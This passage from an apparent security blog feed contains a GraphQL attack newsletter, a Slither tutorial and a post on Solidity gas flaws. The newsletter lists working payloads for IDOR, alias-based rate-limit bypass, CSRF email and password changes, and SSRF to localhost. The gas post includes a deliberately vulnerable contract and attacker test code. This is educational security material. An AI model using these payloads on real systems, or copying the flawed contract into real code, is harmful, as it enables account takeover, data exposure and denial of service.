Available at: [https://www.goodreads.com/book/show/30659.Meditations](https://www.goodreads.com/book/show/30659.Meditations)</content:encoded><author>Ruben Santos</author></item><item><title>First Issue – Let’s Go</title><link>https://www.kayssel.com/newsletter/issue-1</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-1</guid><description>First Newsletter!</description><pubDate>Sun, 20 Apr 2025 08:32:00 GMT</pubDate><content:encoded>Welcome to my first newsletter!

The purpose of this is simple:  
To have a direct channel where I can share my thoughts, keep you updated when a new blog post drops, and deliver offensive security techniques I’ve learned during the week.

This isn’t about theory or abstract ideas.  
It’s about giving you real, actionable tactics you can recognize and apply when you face real targets.

Because at the end of the day, one of the most powerful ways to improve in offensive security, whether you&apos;re studying for a cert like the OSCP or working in the field, is by building mental muscle memory.

The more techniques you archive in your mind (or in a structured place like Obsidian or GitBook), the faster you&apos;ll be able to recognize patterns during an audit and know exactly what to try.

If you&apos;re serious about growing in this field, you should be building your own version of HackTricks: a personal methodology, refined over time.

# Offensive GraphQL Techniques You Should Know

We&apos;re starting with GraphQL.  
This is part of a [broader API hacking series](https://www.kayssel.com/series/hacking-apis/) I’m working on, and this drop summarizes key attack vectors you can add to your methodology right away.

## Discovering GraphQL Endpoints

To confirm that a URL is exposing a GraphQL endpoint, send this simple query:

```graphql
query { __typename }
```

&lt;details&gt;
&lt;summary&gt;If the response includes:&lt;/summary&gt;

```json
{ &quot;data&quot;: { &quot;__typename&quot;: &quot;query&quot; } }
```
&lt;/details&gt;


Then you’ve found a GraphQL endpoint.

Try common paths:

-   `/graphql`
-   `/api/graphql`
-   `/graphql/api`
-   `/graphql/graphql`
-   `/v1/graphql`

Tools like Burp Scanner can automate this discovery or [Graphw00f](https://github.com/dolevf/graphw00f)

## Introspecting the Schema

If introspection is enabled, you can reveal the full structure of the API.

&lt;details&gt;
&lt;summary&gt;Basic probe:&lt;/summary&gt;

```graphql
query {
  __schema {
    queryType { name }
  }
}
```
&lt;/details&gt;


Use full introspection queries with tools like [GraphQL Voyager](https://github.com/APIs-guru/graphql-voyager) to visualize relationships between types, queries, and mutations. If introspection is disabled, check the next technique.

## Discovering Schema Without Introspection

Even when introspection is disabled, GraphQL frameworks like Apollo may leak schema hints via error messages.

&lt;details&gt;
&lt;summary&gt;Try sending typos like:&lt;/summary&gt;

```graphql
query { getUsre }
```
&lt;/details&gt;


Apollo might respond with:

&gt; Did you mean &quot;getUser&quot;?

Tools like [Clairvoyance](https://github.com/nikitastupin/clairvoyance) automate this kind of discovery.

## Exploiting Unsanitized Arguments (IDOR)

APIs that expose resources directly via user-controlled arguments may be vulnerable to Insecure Direct Object References.

&lt;details&gt;
&lt;summary&gt;For example:&lt;/summary&gt;

```graphql
query {
  getUserById(id: &quot;1234&quot;)
}
```
&lt;/details&gt;


If there’s no access control check, changing the ID may leak sensitive data from other users.

## Bypassing Rate Limiting Using Aliases

Aliases let you request the same field multiple times in a single HTTP request, bypassing naive rate-limiting protections.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```graphql
query {
  d1: isValidDiscount(code: &quot;AAA&quot;)
  d2: isValidDiscount(code: &quot;BBB&quot;)
  d3: isValidDiscount(code: &quot;CCC&quot;)
}
```
&lt;/details&gt;


This allows you to brute-force or scan multiple entries in one request, avoiding WAF or IP-based limits.

## Finding CSRF Vulnerabilities in GraphQL

Some GraphQL APIs accept unsafe request types like `GET` or `POST` with non-JSON content types (e.g., `x-www-form-urlencoded`), making them vulnerable to CSRF.

To test this:

-   If either request goes through and performs the mutation, you’ve got a CSRF vector.

Try a simple `GET` request with the query in the URL

```graphql
GET /graphql?query=mutation+{changeEmail(newEmail:&quot;attacker@example.com&quot;)} HTTP/1.1
```

Send a `POST` request with `Content-Type: x-www-form-urlencoded`

```graphql
POST /graphql HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=mutation+{updatePassword(newPassword:&quot;123456&quot;)}

```

Secure GraphQL implementations should:

-   Only accept `application/json`
-   Enforce CSRF tokens

## SSRF via GraphQL Mutations

Some mutations take URLs as arguments and pass them to backend logic. If there’s no input validation, you may be able to perform Server-Side Request Forgery.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```graphql
mutation {
  updatePlant(sourceURL: &quot;http://127.0.0.1:8888&quot;)
}
```
&lt;/details&gt;


This could let you scan internal services or hit cloud metadata endpoints. In vulnerable setups, it can lead to privilege escalation.

## Where to Practice

You can practice these techniques in realistic labs and machines. Here are a few resources:

-   [PortSwigger Web Security Academy – GraphQL Labs](https://portswigger.net/web-security/graphql)
-   [Damn Vulnerable GraphQL Application](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)

And these retired Hack The Box machines:

-   [Overgraph (06 Aug 2022)](https://app.hackthebox.com/machines/Overgraph)
-   [Cereal (29 May 2021)](https://app.hackthebox.com/machines/Cereal)
-   [Help (08 Jun 2019)](https://app.hackthebox.com/machines/Help)

* * *

## New Article!

This week’s article is a bit different from the usual technical drops.

It’s about purpose. Why it matters. How to think about it. How to design your own.

To be honest, writing it made me feel a bit vulnerable. I&apos;m not an expert in philosophy or personal development, and I even hesitated to publish it. But I believe it’s an important topic, and maybe it will help someone who feels a bit lost or disconnected right now.

If you&apos;re in that place, or just want to reflect deeper on where you&apos;re headed, it might resonate with you.

[Read the first article here](https://www.kayssel.com/post/mentaility-1/)

Let me know your thoughts if you read it. I’d love to hear your feedback.

[Subscribe now](%%checkout_url%%)</content:encoded><category>Newsletter</category><category>web-security</category><category>api-security</category><author>Ruben Santos</author></item><item><title>Slither: Your First Line of Defense in Smart Contract Security</title><link>https://www.kayssel.com/post/web3-17</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-17</guid><description>Slither: A powerful static analysis tool that scans smart contracts for vulnerabilities, maps attack surfaces, and visualizes code relationships—essential for efficient security auditing and penetration testing of blockchain applications.</description><pubDate>Sun, 06 Apr 2025 09:58:37 GMT</pubDate><content:encoded># Introduction

Welcome back to my Web3 security series! If you&apos;ve stuck around all the way to entry **#17**, you deserve a virtual high-five — either you&apos;re genuinely fascinated by smart contract auditing, or you&apos;ve invested too many hours to bail now. Either way, I&apos;m glad you&apos;re here!

By this point, you&apos;ve probably encountered more `require()` statements than actual humans this week. Your dreams might feature reentrancy attacks, your lunch breaks are spent pondering frontrunning vulnerabilities, and you may have caught yourself whispering &quot;msg.sender&quot; in quiet moments. Don&apos;t worry—we&apos;re all a little weird here in security-land.

Today, I&apos;m excited to introduce you to a tool that&apos;s saved my sanity countless times: [**Slither**.](https://github.com/crytic/slither) No, it&apos;s not a reptile (though it does sniff out dangerous code-creatures with impressive accuracy). Developed by the brilliant minds at Trail of Bits, Slither is essentially a security scanner with superpowers—open source, extensively tested, and considerably less sweaty than actual steroids.

In this post, I&apos;ll walk you through:

-   What makes Slither tick under the hood (explained in human language, I promise)
-   Why virtually every security professional I know keeps it in their toolbox
-   How you can start using it today to catch bugs before they catch you

We&apos;ll even roll up our sleeves with a practical example—because while theory is nice, watching Slither flag a potential exploit in real-time is downright satisfying.

So grab your favorite caffeinated beverage, make sure your terminal is ready, and let&apos;s get slithering into the world of automated smart contract analysis! 🐍

# What is Slither?

For those of us in the security trenches, hunting vulnerabilities across smart contracts day after day, Slither is essentially our reconnaissance tool of choice.

At its core, Slither is a static analysis framework that gives penetration testers and security auditors an immediate advantage when approaching a new smart contract codebase. Unlike many tools that simply generate noise, Slither provides actionable intelligence about the attack surface you&apos;re dealing with.

When I&apos;m approaching a new audit engagement with limited time (and let&apos;s be honest, when aren&apos;t we on a tight deadline?), Slither gives me that critical first look at what I&apos;m dealing with. It&apos;s like having satellite imagery before entering unfamiliar territory.

What makes Slither indispensable for security professionals:

-   **It maps the attack surface** by identifying externally accessible functions, public state variables, and potential entry points for exploitation
-   **It flags high-value targets** like privileged functions, self-destruct mechanisms, and direct ETH transfers that warrant immediate attention
-   **It traces execution paths** through complex contract interactions, helping spot vulnerable flows that might otherwise take days to identify manually
-   **It detects common vulnerability patterns** that experienced attackers will immediately target in production

I&apos;ve lost count of how many times Slither has revealed critical vulnerability paths that weren&apos;t immediately apparent from manual code review. Those subtle cross-contract interactions or state modifications after external calls that represent perfect exploitation opportunities? Slither excels at bringing these to light.

What particularly separates Slither from other security tools is its remarkably low false-positive rate. When Slither flags something as potentially dangerous, it&apos;s almost always worth investigating. This precision is invaluable when you&apos;re operating under audit time constraints and need to prioritize your efforts effectively.

Even for seasoned security professionals, Slither serves as an excellent starting point to orient yourself within complex systems. Rather than spending hours manually tracing inheritance hierarchies or mapping dependency structures, Slither gives you that information upfront, allowing you to focus your expertise on finding the non-obvious vulnerabilities that automated tools might miss.

In my pentesting toolkit, Slither is typically the first weapon I deploy – it helps me understand what I&apos;m up against before I start crafting more targeted exploits.

# How Does Slither Work?

Understanding how Slither analyzes smart contracts gives us a strategic advantage. Rather than just accepting its findings blindly, knowing its inner workings helps us leverage the tool more effectively and understand where to dig deeper.

At a high level, Slither operates like an advanced reconnaissance system for smart contract battlefields. Let me walk you through what&apos;s happening under the hood when you point it at a codebase.

### **Phase 1: Building Intelligence Through Parsing**

First, Slither uses the Solidity compiler frontend to generate an **Abstract Syntax Tree (AST)** of the target contract. This is essentially a structured representation of the code that makes it possible to analyze programmatically.

This initial parsing phase is critical because it extracts key tactical information:

-   The complete **inheritance hierarchy** - crucial for understanding privilege escalation vectors
-   **Control flow graphs** for every function - revealing all possible execution paths an attacker might follow
-   **Variable scopes and definitions** - identifying potential storage collision attacks

What makes this parsing phase powerful is that Slither doesn&apos;t just capture individual contract elements in isolation - it builds a comprehensive map of how everything interconnects.

### **Phase 2: Transforming into SlithIR for Deeper Analysis**

The most powerful aspect of Slither comes next: it converts the parsed code into **SlithIR**, an intermediate representation specifically designed for security analysis.

This transformation is where Slither really differentiates itself from basic linting tools. SlithIR uses **Static Single Assignment (SSA)** form - a representation where each variable is defined exactly once. This is invaluable because it allows precise tracking of:

-   **Data flow paths** - showing exactly how user input can propagate to sensitive operations
-   **State modifications** - revealing where contract storage gets altered
-   **Cross-function dependencies** - exposing how one vulnerable function might compromise others

The SSA form makes it significantly easier to detect subtle vulnerability patterns like reentrancy, where the sequence of state updates and external calls becomes critical.

### **Phase 3: Executing Specialized Detectors**

Armed with this highly structured representation, Slither unleashes its arsenal of **specialized vulnerability detectors** - each designed to identify specific attack vectors:

-   **Taint analysis** systematically traces user-controlled input through the application flow, flagging when it reaches sensitive operations like `selfdestruct` or `delegatecall`
-   **Storage access pattern analysis** identifies dangerous sequences like &quot;read, external call, write&quot; that often indicate reentrancy vulnerabilities
-   **Authorization analysis** maps which addresses or roles can access which functions, exposing privilege issues

These detectors use graph-based algorithms to identify vulnerability patterns across the entire codebase, not just within individual functions or contracts.

# Installation and First Steps

Setting up Slither properly is your first engagement in the smart contract security battlefield. As a penetration tester, you need reliable tools that integrate seamlessly into your workflow without becoming a distraction. Here&apos;s how to get your Slither environment battle-ready.

### The Arsenal: Prerequisites

Before deploying Slither, ensure your penetration testing environment has these essentials:

-   **Python 3.6+** - The runtime environment that powers Slither
-   **pip3** - Your package acquisition system
-   **Solidity compiler** - Ideally with multiple versions available for testing against different compiler targets

For serious contract pentesting, I strongly recommend having multiple Solidity compiler versions accessible. Different projects compile with different versions, and compiler-specific bugs can sometimes be part of your attack vector. Check your current `solc` setup with:

```bash
solc --version

```

If you need to manage multiple compiler versions (and trust me, you will), install `solc-select`:

```solidity
pip3 install solc-select

```

&lt;details&gt;
&lt;summary&gt;This gives you the ability to switch compiler versions on demand:&lt;/summary&gt;

```solidity
solc-select install 0.8.17
solc-select use 0.8.17

```
&lt;/details&gt;


### Deploying Slither

Now for Slither itself. Installation is straightforward, but pay attention to the output for any dependency warnings:

```solidity
pip3 install slither-analyzer

```

&lt;details&gt;
&lt;summary&gt;Verify your deployment with:&lt;/summary&gt;

```solidity
slither --version

```
&lt;/details&gt;


Pro tip: If you&apos;re using Slither frequently across different client engagements, consider creating a dedicated virtual environment to avoid tool conflicts:

```solidity
python3 -m venv slither-env
source slither-env/bin/activate
pip3 install slither-analyze

```

This isolation approach ensures your reconnaissance tooling remains stable regardless of other Python packages installed on your system.

### Analyzing Your First Contract

Let’s analyze the contract we developed in [entry #16](https://www.kayssel.com/post/web3-16/) of this series, where we explored gas-related issues in Web3. You can run Slither on it with a simple command like:

```bash
slither src/contract.sol

```

![](/content/images/2025/03/image-12.png)

Running Slither for the first time

Once executed, Slither will output a detailed report directly in your terminal. For instance, running it on our gas-focused contract reveals potential reentrancy issues and unsafe external calls:

Here’s what Slither provides out of the box:

-   **Detected vulnerabilities**  
    Reentrancy, shadowed variables, missing zero-address checks, and more.
-   **Contract structure and inheritance**  
    Including function relationships, modifier usage, and visibility.
-   **Storage access patterns**  
    For example, state variables modified after external calls — a common source of bugs.
-   **Gas optimization tips**  
    Such as identifying variables that could be marked as `constant` or `immutable`.

Even on a relatively simple contract, Slither surfaces a surprising amount of insight. The more complex the logic, the more valuable its output becomes — especially when used early in development or during security reviews.

# Practice Example

Let&apos;s examine a practical application of Slither against our target contract from last week. While Slither offers numerous advanced options, I&apos;ll demonstrate the reconnaissance approaches that consistently deliver the highest value intelligence during my own contract penetration tests.

First, I&apos;ll deploy Slither for an initial vulnerability scan:

```solidity
slither . 

```

This baseline scan reveals potential exploitation paths ranked by severity – from critical issues that warrant immediate attention to informational findings that might contribute to chained attacks.

Beyond this standard reconnaissance, I leverage two specialized intelligence-gathering commands:

```bash
slither . --print contract-summary

```

![](/content/images/2025/04/image-1.png)

Basic recon

This generates a rapid overview of the target&apos;s capabilities and structure – similar to mapping a facility&apos;s floor plan before launching a physical penetration test.

Next, I map the permission structure to identify access control weaknesses:

```bash
slither . --print vars-and-auth

```

![](/content/images/2025/04/image.png)

Auth recon

This shows me the permission structure - which functions can modify which variables, and who has access to what.

While command line tools are powerful, most of us work in code editors day-to-day. If you&apos;re using Visual Studio Code like me, there are two extensions that will absolutely transform your auditing experience:

-   Solidity Visual Developer
-   Slither

Once you&apos;ve installed these, open your project and click the &quot;play&quot; button in the Slither extension panel. After a few seconds, you&apos;ll see all potential vulnerabilities displayed in a much more digestible format than the command line output.

What&apos;s really cool is that you can click on any finding and VS Code will instantly jump to the exact line of code where Slither detected an issue. No more hunting through files!

![](/content/images/2025/04/image-7.png)

Slither in vscode

![](/content/images/2025/04/image-3.png)

Jumping to the function

The Solidity Visual Developer extension lets you create audit annotations right in your code using the `@audit` keyword. For example:

![](/content/images/2025/04/image-8.png)

Using notation

This makes it incredibly easy to collect all your findings when it&apos;s time to write up that final report, especially when you&apos;re reviewing thousands of lines of code across multiple contracts.

One of my favorite features is the ability to generate interactive graphs that visualize contract structures and relationships. While our example is just a small contract, this becomes invaluable when dealing with complex systems.

You can see function call graphs, inheritance patterns, and storage access paths - all as interactive diagrams you can click through. It&apos;s like having a map of the codebase that shows not just what exists, but how everything connects.

![](/content/images/2025/04/image-5.png)

Graph representation

The extension offers several different visualization options, from straightforward inheritance trees to complex call graphs that show exactly how data flows through the system.

![](/content/images/2025/04/image-6.png)

Different ways to represent information

# Conclusions: Slithering Towards Web3 Security

And that&apos;s where we&apos;ll wrap up our introduction to Slither! As you can see, having a snake in your security toolkit isn&apos;t always a bad idea (unless you&apos;re in a Samuel L. Jackson movie, of course).

We&apos;ve seen how Slither can become your best ally in detecting vulnerabilities before hackers find them and decide your smart contract is the ATM of the month. From static analysis to visualizations that would make a graphic designer weep, this tool has everything you need to sleep a little more soundly at night.

I&apos;m leaving the article here because, honestly, it was getting a bit long (and I don&apos;t want you needing extra coffee to finish reading it). Plus, my keyboard was starting to smoke and I don&apos;t have the budget for a new one this month.

In the next article, we&apos;ll dive into Slither&apos;s API and see how we can program with it to create our own custom detectors. Because, let&apos;s be honest, what&apos;s more fun than writing code to analyze code? It&apos;s like that scene from Inception, but with less Leonardo DiCaprio and more blockchain security.

Until then, keep your contracts clean and your variables initialized. Web3 security will thank you, and so will your digital wallet.

# References

-   Trail of Bits. &quot;Slither Documentation: A Solidity Static Analysis Framework.&quot; Available at: [https://github.com/crytic/slither/wiki](https://github.com/crytic/slither/wiki)
-   Juan Blanco. &quot;Solidity Visual Developer Extension for VS Code.&quot; Available at: [https://marketplace.visualstudio.com/items?itemName=JuanBlanco.solidity](https://marketplace.visualstudio.com/items?itemName=JuanBlanco.solidity)
-   Trail of Bits. &quot;Slither VS Code Extension.&quot; Available at: [https://marketplace.visualstudio.com/items?itemName=trailofbits.slither-vscode](https://marketplace.visualstudio.com/items?itemName=trailofbits.slither-vscode)
-   Feist, J., Grieco, G., &amp; Groce, A. &quot;Slither: A Static Analysis Framework For Smart Contracts.&quot; In 2019 IEEE/ACM 2nd International Workshop on Emerging Trends in Software Engineering for Blockchain (WETSEB), 2019, 8–15. Available at: [https://ieeexplore.ieee.org/document/8823898](https://ieeexplore.ieee.org/document/8823898)
-   Ghaleb, A., &amp; Pattabiraman, K. &quot;How effective are smart contracts analysis tools?&quot; In Proceedings of the 29th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA ’20), 2020, Virtual Event, USA, 11 páginas. Available at: [https://doi.org/10.1145/3395363.3397385](https://dl.acm.org/doi/10.1145/3395363.3397385)</content:encoded><author>Ruben Santos</author></item><item><title>Fuel for the Ritual: Gas Mechanics and Misfires in Web3</title><link>https://www.kayssel.com/post/web3-16</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-16</guid><description>Learn how poor gas management can break smart contracts, open attack vectors, and waste resources. We explore real examples, test cases, and practical tips to help you audit and optimize gas usage like a pro—without burning your mana.</description><pubDate>Sun, 30 Mar 2025 14:57:41 GMT</pubDate><content:encoded># Let’s Talk Gas (No, Not That Kind)

If you’ve ever tried deploying a smart contract and thought, _“Why is this thing costing me more than my last flight?”_ — welcome to the wonderful world of **gas** in Web3.

Gas isn’t just something that clogs your nose after too many beans. In Ethereum and other EVM-based blockchains, gas is the fuel that powers every interaction—from simple ETH transfers to complex DeFi spells. And just like in the real world, if you’re not careful, you can burn through a lot of it fast.

But here’s the twist: gas doesn’t just affect your wallet—it can break your contracts, open up attack vectors, and cause silent logic failures that are hard to detect and even harder to debug.

In this post, I&apos;m going to explore what gas really is, how it can be abused, and how to make your contracts leaner, safer, and way less embarrassing on-chain. Bring your grimoire, and let’s get started.

# **What is Gas in Web3?**

If you’ve ever interacted with Ethereum or any other EVM (Ethereum Virtual Machine)-based blockchain, you’ve probably come across the term &quot;gas.&quot;

And let’s be honest, the first time you saw it, you probably thought:

What exactly is gas, and why do I have to pay for it?

Well, simply put, gas is the fuel that powers the blockchain. Every time you execute a transaction—whether it&apos;s sending ETH, minting an NFT, or interacting with a smart contract—you’re asking the network to perform computations on your behalf. And, of course, that work isn’t free.

Imagine the blockchain as a highway and transactions as cars. To drive on this highway, you need fuel (gas). If you want to get to your destination faster, you can pay more gas to move ahead. But if there’s a traffic jam (network congestion), gas prices spike because everyone is trying to move at the same time.

So in summary:

-   Gas = The computational energy required to execute blockchain transactions.
-   It’s paid in ETH (or the blockchain’s native token).
-   The more complex the transaction, the more gas it consumes.

## **How is Gas Calculated in Ethereum?**

Gas is measured in **gas units**, and every Solidity operation has a specific gas cost. The basic formula is:

```solidity
Total Gas Cost = Gas Units Used × Gas Price (in gwei)

```

-   Sending ETH from one address to another costs 21,000 gas.
-   Executing a function in a smart contract could cost 50,000 gas or more.
-   If the gas price is 30 gwei, sending ETH would cost:

```solidity
21,000 gas × 30 gwei = 630,000 gwei = 0.00063 ETH

```

When signing a transaction, you can adjust the gas price:

-   If you pay more gas, your transaction gets confirmed faster.
-   If you pay less gas, it may take longer or even get stuck.

# Understanding the Contract

Before diving into vulnerabilities or test cases, it’s important to understand how this contract works. Think of it as a digital grimoire—each function is a spell, each variable a channel of stored energy, and every interaction triggers a small piece of executable magic.

This setup includes two contracts: **GrimoireOfEchoes**, which acts as the main contract, and **OracleOfWhispers**, an external component used to record specific actions. Let’s walk through each part of the system.

&lt;details&gt;
&lt;summary&gt;Smart Contract Code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &quot;forge-std/console.sol&quot;;

contract GrimoireOfEchoes {
    mapping(address =&gt; uint256) public manaReservoir;
    uint256 public corruptionIndex;
    uint256 public forbiddenTithe;
    address public oracle;
    event SpellBackfired(address target, bytes incantation);

    constructor(address _oracle) {
        oracle = _oracle;
        forbiddenTithe = 100;
    }

    function channelMana() public payable {
        manaReservoir[msg.sender] += msg.value;
    }

    function releaseEssence() public {
        uint256 essence = manaReservoir[msg.sender];
        require(essence &gt; 0, &quot;No essence bound&quot;);

        (bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);
        require(success, &quot;Ritual disrupted&quot;);

        manaReservoir[msg.sender] = 0;
    }

    function amplifySpirits(address[] calldata spirits) public {
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
        }
    }

    function invokeOracle() public {
        require(msg.sender != tx.origin, &quot;Only summoned entities may invoke&quot;);

        corruptionIndex += 1;
        (bool success, ) = oracle.call(
            abi.encodeWithSignature(&quot;recordInvocation()&quot;)
        );

        if (success) {
            corruptionIndex -= 1;
        }
    }
}

contract OracleOfWhispers {
    mapping(address =&gt; bool) public invoked;
    event InvocationRecorded(address caller);

    function recordInvocation() external {
        require(!invoked[msg.sender], &quot;Already invoked&quot;);

        invoked[msg.sender] = true;
        emit InvocationRecorded(msg.sender);
    }
}


```
&lt;/details&gt;


#### State Variables

-   `mapping(address =&gt; uint256) public manaReservoir;`  
    This mapping tracks the &quot;mana&quot; (ETH) each user has deposited into the contract.
-   `uint256 public forbiddenTithe = 100;`  
    A fixed fee stored in state, although it’s not currently used. Consider it a placeholder for a future arcane tax.
-   `uint256 public corruptionIndex;`  
    A counter that tracks how many times someone has attempted to invoke the oracle. Think of it as a log of attempted invocations.
-   `address public oracle;`  
    This holds the address of the external `OracleOfWhispers` contract, which is called during specific actions.
-   `event SpellBackfired(address target, bytes incantation);`  
    An event meant to signal failed external calls, although it’s not emitted in the current implementation.

### Constructor

```solidity
constructor(address _oracle) {
    oracle = _oracle;
}

```

When the contract is deployed, it requires the address of the oracle contract. This establishes a fixed link between the two, allowing the main contract to call the oracle later on.

### channelMana

```solidity
function channelMana() public payable {
    manaReservoir[msg.sender] += msg.value;
}

```

This function allows users to send ETH to the contract, increasing their mana balance. It’s a simple deposit mechanism, storing value under their address.

### releaseEssence()

```solidity
function releaseEssence() public {
    uint256 essence = manaReservoir[msg.sender];
    require(essence &gt; 0, &quot;No essence bound&quot;);

    (bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);
    require(success, &quot;Ritual disrupted&quot;);

    manaReservoir[msg.sender] = 0;
}

```

This function lets users withdraw the ETH they’ve deposited. It attempts to send the exact amount back to the caller using a low-gas `call`, and if it succeeds, their balance is reset to zero. If the call fails, the entire transaction is reverted.

### amplifySpirits

```solidity
function amplifySpirits(address[] calldata spirits) public {
    for (uint256 i = 0; i &lt; spirits.length; i++) {
        manaReservoir[spirits[i]] = manaReservoir[spirits[i]] * 2;
    }
}

```

This function doubles the mana of each address passed into it. It’s a kind of collective buff—a spell that amplifies the stored ETH of multiple users at once.

### invokeOracle()

```solidity
function invokeOracle() public {
    require(msg.sender != tx.origin, &quot;Only summoned entities may invoke&quot;);

    corruptionIndex += 1;
    (bool success, ) = oracle.call(
        abi.encodeWithSignature(&quot;recordInvocation()&quot;)
    );

    if (success) {
        corruptionIndex -= 1;
    }
}

```

This function can only be called by other contracts (not externally owned accounts). When invoked, it increases the corruption counter and calls `recordInvocation()` on the external oracle. If the call is successful, it rolls back the counter. If not, the corruption remains—a trace of a failed ritual.

### OracleOfWhispers – The Invocation Registry

This contract records whether an address has performed a certain action. It acts like a magical ledger that tracks who has summoned it.

#### State

-   `mapping(address =&gt; bool) public invoked;`  
    This mapping marks whether an address has successfully recorded an invocation.

### recordInvocation

```solidity
function recordInvocation() external {
    require(!invoked[msg.sender], &quot;Already invoked&quot;);

    invoked[msg.sender] = true;
    emit InvocationRecorded(msg.sender);
}

```

Only callable once per address, this function records that the caller has performed an invocation and emits an event. It’s a lightweight registry of who has interacted with the oracle.

# Understanding Each Vulnerability Through Test Cases

Now that we understand how the GrimoireOfEchoes and the OracleOfWhispers work, it&apos;s time to examine the flaws in their logic. Each of the following vulnerabilities represents a common class of issues in smart contracts, particularly those related to gas usage. Alongside each explanation, we reference a test case that demonstrates how these flaws behave in practice.

&lt;details&gt;
&lt;summary&gt;Test Case&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/VulnerableContract.sol&quot;;

contract GrimoireTest is Test {
    GrimoireOfEchoes grimoire;
    OracleOfWhispers oracle;
    ArcaneInvoker attacker;

    address user = address(0x123);
    address[] spirits = new address[](100);
    address payable essenceBearer = payable(address(0x456));

    function setUp() public {
        oracle = new OracleOfWhispers();
        grimoire = new GrimoireOfEchoes(address(oracle));
        attacker = new ArcaneInvoker();
    }

    function testEssenceReleaseFailsForContractReceiver() public {
        vm.deal(address(attacker), 10 ether);
        vm.deal(address(grimoire), 10 ether);

        attacker.channelManaToGrimoire{value: 1 ether}(payable(address(grimoire)));

        vm.expectRevert();
        attacker.releaseEssenceFromGrimoire(address(grimoire));
    }

    function testAmplifyFailsDueToBlockGasLimit() public {
        vm.deal(address(grimoire), 10 ether);
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            spirits[i] = address(uint160(i + 1));
        }

        vm.expectRevert();
        grimoire.amplifySpirits(spirits);
    }

    function testInsufficientGasInvocation() public {
        vm.deal(address(grimoire), 10 ether);

        attacker.performGriefingInvocation(address(grimoire));

        uint256 index = grimoire.corruptionIndex();
        console.log(&quot;Corruption index after failed invocation:&quot;, index);
        assertEq(index, 1);
    }
}
contract ArcaneInvoker {
    receive() external payable {
        uint256 entropy;
        for (uint256 i = 0; i &lt; 10000; i++) {
            entropy += i;
        }
        console.log(&quot;Remaining mana (gas): %s&quot;, gasleft());
    }

    function channelManaToGrimoire(address payable grimoireAddress) public payable {
        GrimoireOfEchoes(grimoireAddress).channelMana{value: msg.value}();
    }

    function releaseEssenceFromGrimoire(address grimoireAddress) public {
        GrimoireOfEchoes(grimoireAddress).releaseEssence();
    }

    function performGriefingInvocation(address grimoireAddress) public {
        bytes memory incantation = abi.encodeWithSignature(&quot;invokeOracle()&quot;);
        grimoireAddress.call{gas: 50000}(incantation);
    }
}

```
&lt;/details&gt;


## Low-Gas Transfer to Contracts

**Vulnerability**: Using a fixed gas stipend (2300 gas) to send ETH prevents contract receivers from executing code in their fallback or receive functions, potentially causing the transfer to fail.

In `releaseEssence()`, the Grimoire attempts to send ETH back to the caller using:

```solidity
(bool success, ) = payable(msg.sender).call{gas: 2300, value: essence}(&quot;&quot;);

```

This pattern was historically recommended to prevent reentrancy attacks, as 2300 gas is only enough to emit an event or write to storage. However, if the recipient is a contract with any logic in its `receive()` function—even a small loop—it will require more than 2300 gas, and the call will fail.

In `testEssenceReleaseFailsForContractReceiver()`, the attacker deposits ETH into the Grimoire, then tries to withdraw it. However, the attacker&apos;s contract includes a `receive()` function with a gas-consuming loop, which causes the withdrawal to fail due to the insufficient gas provided by the fixed 2300 stipend.

```solidity
function testEssenceReleaseFailsForContractReceiver() public {
        vm.deal(address(attacker), 10 ether);
        vm.deal(address(grimoire), 10 ether);

        attacker.channelManaToGrimoire{value: 1 ether}(payable(address(grimoire)));

        vm.expectRevert();
        attacker.releaseEssenceFromGrimoire(address(grimoire));
    }

```

```solidity
receive() external payable {
        uint256 entropy;
        for (uint256 i = 0; i &lt; 10000; i++) {
            entropy += i;
        }
        console.log(&quot;Remaining mana (gas): %s&quot;, gasleft());
    }

```

![](/content/images/2025/03/image-7.png)

Revert - out of gas

As shown in the trace output in the image above, the test confirms the revert due to an `OutOfGas` error in the `receive()` function, and the revert message matches the expected failure path in `releaseEssence()`.

## Denial of Service via Block Gas Limit

**Vulnerability**: Functions that perform unbounded loops over user-controlled data risk exceeding the block gas limit, rendering them unusable and opening the door to denial-of-service attacks.

The function `amplifySpirits()` doubles the mana of each address in the input array:

```solidity
for (uint256 i = 0; i &lt; spirits.length; i++) {
    manaReservoir[spirits[i]] *= 2;
}

```

There is no input validation or limit on the array length. If the array is too large, the gas cost of the loop will exceed the block gas limit, and the transaction will revert.

In `testAmplifyFailsDueToBlockGasLimit()`, we attempt to simulate this by generating a large array of addresses and passing it to `amplifySpirits()`. However, in practice, the failure occurs **before the function is even called**—specifically during this line:

```solidity
spirits[i] = address(uint160(i + 1));

```

```solidity
function testAmplifyFailsDueToBlockGasLimit() public {
        vm.deal(address(grimoire), 10 ether);
        for (uint256 i = 0; i &lt; spirits.length; i++) {
            spirits[i] = address(uint160(i + 1));
        }

        vm.expectRevert();
        grimoire.amplifySpirits(spirits);
    }

```

![](/content/images/2025/03/image-11.png)

Out of gas because spirit&apos;s map

The act of populating the array with 100,000 addresses consumes so much gas that the test reverts before reaching the contract call. Determining the exact value of `i` that would push it over the edge is non-trivial, as it depends on block limits, memory usage, and environment configuration.

Still, the point stands: functions that rely on unbounded loops over user input are fragile and can easily break under realistic conditions. Whether the gas runs out during input preparation or contract execution, the root issue is the same—a lack of bounds or batching in logic that scales with user data.

As seen in the gas report image below, the `testAmplifyFailsDueToBlockGasLimit()` appears to **pass**, but this is only because the test was modified to do so. Specifically, the `vm.expectRevert()` was removed, and the number of addresses in the input array was reduced to 100. This allows the test to complete successfully, making it possible to extract a meaningful gas estimate using `forge test --gas-report`.

![](/content/images/2025/03/image-10.png)

Gas report

